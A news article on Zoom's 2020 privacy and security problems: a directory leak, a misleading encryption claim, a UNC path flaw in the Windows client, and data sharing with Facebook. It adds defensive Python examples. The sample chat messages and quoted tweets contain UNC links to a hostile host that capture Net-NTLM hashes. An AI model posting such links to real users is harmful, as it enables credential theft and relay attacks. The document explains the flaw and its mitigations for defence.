According to a Motherboard article published on Tuesday, video-calling service Zoom accidentally exposed the personal email addresses and photos of thousands of its users. The leak came from its “Company Directory” feature, which groups together users who share the same email domain on the assumption that they belong to the same organisation.
Since mid-March, Zoom users on Twitter have been reporting that the feature groups thousands of strangers as if they all worked for the same company, sharing their names, email addresses and photos with everyone in the group.
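To show where the directory logic goes wrong, the following added example (not Zoom's code; the user records, the domain names and the VERIFIED_ORG_DOMAINS set are all constructed for the illustration) puts a naive directory that groups accounts purely by email domain next to one that only groups accounts under domains an organisation has verified it controls:

```python
from __future__ import annotations
from collections import defaultdict

# Constructed sample accounts: fictional names and domains, not data from the article.
SAMPLE_USERS = [
    {"name": "Alice", "email": "alice@acme.example"},
    {"name": "Bob",   "email": "Bob@ACME.example"},        # same org, different letter case
    {"name": "Carol", "email": "carol@smallisp.example"},  # personal mailbox at a small ISP
    {"name": "Dan",   "email": "dan@smallisp.example"},    # a stranger at the same ISP
    {"name": "Eve",   "email": "eve@gmail.com"},
]

# Hypothetical result of a domain-ownership check (e.g. a DNS TXT record the org published).
VERIFIED_ORG_DOMAINS = frozenset({"acme.example"})


def email_domain(email: str) -> str:
    """Domain part of an address, lower-cased so Bob@ACME.example matches acme.example."""
    return email.rsplit("@", 1)[1].lower()


def directory_naive(users: list[dict]) -> dict[str, list[str]]:
    """Flawed rule: any two accounts sharing an email domain are 'the same company'."""
    groups: dict[str, list[str]] = defaultdict(list)
    for user in users:
        groups[email_domain(user["email"])].append(user["name"])
    # Singletons have nobody to be exposed to; every other domain becomes a shared directory.
    return {domain: names for domain, names in groups.items() if len(names) > 1}


def directory_hardened(users: list[dict], verified_domains: frozenset[str]) -> dict[str, list[str]]:
    """Only domains an organisation has proven it controls are grouped into a directory."""
    groups: dict[str, list[str]] = defaultdict(list)
    for user in users:
        domain = email_domain(user["email"])
        if domain in verified_domains:
            groups[domain].append(user["name"])
    return dict(groups)


def visible_contacts(user: dict, users: list[dict], verified_domains: frozenset[str]) -> list[str]:
    """Names a given user would see in their directory under the hardened rule."""
    domain = email_domain(user["email"])
    return [n for n in directory_hardened(users, verified_domains).get(domain, []) if n != user["name"]]
```

The naive version puts Carol and Dan, two strangers who merely share a small ISP's domain, into one “company” directory; the hardened version shows each of them nobody, because having a mailbox at a domain is not the same as belonging to the organisation that owns it.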
The Intercept also reported that Zoom meetings are not protected by end-to-end encryption, even though the company's marketing repeatedly claims they are. With end-to-end encryption, neither an outside attacker nor Zoom itself could read the contents of a meeting you take part in.
What Zoom actually offers is transport encryption (TLS between the client and Zoom's servers), which protects the traffic from outside eavesdroppers but not from Zoom, whose servers can decrypt it, regardless of what Zoom's marketing says.
Zoom is also in hot water with security researchers, who found that the Windows client turns UNC paths (such as \\host\share) posted in a meeting's chat into clickable links. If a user clicks one, Windows tries to open the remote share over SMB and sends the user's Windows username and Net-NTLM password hash to the host named in the link, where an attacker can capture the hash for offline cracking or relay it in an SMB relay attack.
A few cybersecurity researchers were able to replicate the exploit.
#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users.
— Mitch (@_g0dmode) March 23, 2020
Hi @zoom_us & @NCSC – here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
Zoom had not responded to reports of the Windows flaw at the time of writing.
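As an added example (not Zoom's code; the chat messages, hostnames and paths below are constructed), here is the link-handling logic at the heart of the flaw next to a hardened version. The naive linkifier makes both web URLs and UNC paths clickable; the hardened one keeps web URLs clickable but only lets a UNC path through when its host is on a hypothetical allowlist of the organisation's own file servers, and a small detection helper pulls UNC paths out of a message for logging:

```python
from __future__ import annotations
import re

# Constructed chat messages for the illustration; hosts and paths are made up.
SAMPLE_MESSAGES = [
    "Slides are at https://example.com/deck.pdf",
    r"Minutes: \\10.0.0.5\share\notes.docx",                   # UNC path to an internal server
    r"Also see \\attacker.example\x and http://example.org/",  # UNC path to a hostile server
    "Nothing to click here",
]

# An http(s) URL runs to the next whitespace, angle bracket or quote.
HTTP_URL = re.compile(r'https?://[^\s<>"]+')
# A UNC path: two backslashes, a host, then one or more backslash-separated segments.
UNC_PATH = re.compile(r'\\\\[\w.-]+(?:\\[^\s\\<>"]+)+')


def unc_host(path: str) -> str:
    """Host component of a UNC path: the machine Windows would open an SMB session to."""
    return path[2:].split("\\", 1)[0]


def linkify_naive(message: str) -> list[str]:
    """The vulnerable behaviour: UNC paths become clickable just like web URLs.

    On Windows, clicking a UNC link makes the OS connect to the named host over SMB
    and attempt NTLM authentication, handing that host the user's username and
    Net-NTLM hash, which can be cracked offline or relayed.
    """
    return HTTP_URL.findall(message) + UNC_PATH.findall(message)


def linkify_hardened(message: str, allowed_unc_hosts: frozenset[str] = frozenset()) -> list[str]:
    """Web URLs stay clickable; a UNC path is linkified only if its host is explicitly allowed.

    allowed_unc_hosts is a hypothetical allowlist of an organisation's own file servers,
    so legitimate internal share links keep working while arbitrary hosts do not.
    """
    links = HTTP_URL.findall(message)
    for path in UNC_PATH.findall(message):
        if unc_host(path).lower() in allowed_unc_hosts:
            links.append(path)
    return links


def find_unc_injections(message: str) -> list[str]:
    """Detection helper: every UNC path in a message, for logging or alerting on chat abuse."""
    return UNC_PATH.findall(message)
```

A client-side fix like this should be paired with host and network hardening: the Windows policy “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” (the RestrictSendingNTLMTraffic value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0) can deny NTLM authentication to arbitrary remote hosts, and blocking outbound TCP port 445 at the perimeter stops the SMB connection from ever reaching an attacker's server.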
Finally, the company is being sued for sending user information to Facebook without users' permission.
Vice reports that “by analyzing the network traffic of the Zoom iOS app, Motherboard found that when opened, the app sent information about the user’s device such as the model, the city and timezone they are connecting from, which phone carrier they are using, and a unique advertiser identifier created by the user’s device”.
Arvind Narayanan, a computer-science professor at Princeton, criticized the company for its many security and privacy faults, going so far as to call the service “malware”, as reported by Business Insider.
Let's make this simple: Zoom is malware. https://t.co/xkJDaP4OoK
— Arvind Narayanan (@random_walker) March 31, 2020
It is plausible that all of these issues went largely unnoticed until the coronavirus outbreak drove thousands of people and businesses onto the service. More eyes on the product meant more scrutiny of its flaws.
So far it appears that Zoom was not prepared for its newfound popularity.
Edited by Luis Monzon